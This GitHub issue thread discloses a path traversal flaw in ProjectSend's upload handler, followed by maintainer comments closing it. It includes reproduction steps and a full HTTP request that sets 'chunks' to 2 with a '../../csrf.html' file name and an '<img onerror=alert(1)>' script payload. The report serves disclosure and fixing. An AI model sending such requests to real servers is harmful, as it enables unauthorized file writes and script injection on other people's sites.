### ISSUE TITLE
Path traversal in Upload file function

### ISSUE THREAD

**Issue by KietNA-68** [projectsend/projectsend#993]
Dear @ignacionelson,
I found a Path traversal vulnerability on your application!
# Description
Because of not checking if clause for `chunks` parameter when `chunks` >= 2, the user with Uploader role can add value `2` for `chunks` param to bypass `fileName` sanitizer 
![Image](https://i.imgur.com/UYgOuaJ.png)
- In Step 1: 3 parameter that I can control when using upload function `chunk`, `chunks`, `fileName`

- In Step 2: The if clause check if `chunks` parameter < `2`, the `fileName` parameter will be handled. So i add value `2` for `chunks` param then it will pass Step 2 and go to Step 3

![image](https://user-images.githubusercontent.com/54875703/132298897-8751bf58-4a2e-4e89-a2bd-ddb7c3e4ced0.png)
if  i don't add value for `chunk` then the `chunk` parameter goes to `0` and add value `2` for `chunks` parameter, i can pass this if 

# Step To Reproduce
1. Use burpsuite to capture upload request
2.  Change valuable of `chunks` parameter to `2` and add dot dot for `name` parameter to escape root directory
3.  The file was uploaded in webroot directory with `index.html.part` name

![image](https://user-images.githubusercontent.com/54875703/132299904-a8c6239d-14bd-4529-a213-7411ccefabe1.png)

# Request:
```
POST /includes/upload.process.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4677942761162401681381669887
Content-Length: 2817
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/upload.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;

-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="name"

../../csrf.html
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="chunks"

2
-----------------------------4677942761162401681381669887
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(1);>

-----------------------------4677942761162401681381669887--
```

# Solutions:
Add if clause to check when `chunks` parameter  >= `2`

**Comment by tazmanboo** [comment]
Forgive my cluelessness, but do I just replace this files.pho with the one in from r1095? As I said, I am not a programmer. Thank you.

**Comment by dumbasPL** [comment]
Shouldn't this issue be closed?

**Comment by ehawman** [comment]
Agreed.  @ignacionelson you can knock this off your todo! 😄

**Comment by ignacionelson** [comment]
Thanks for the remainder!
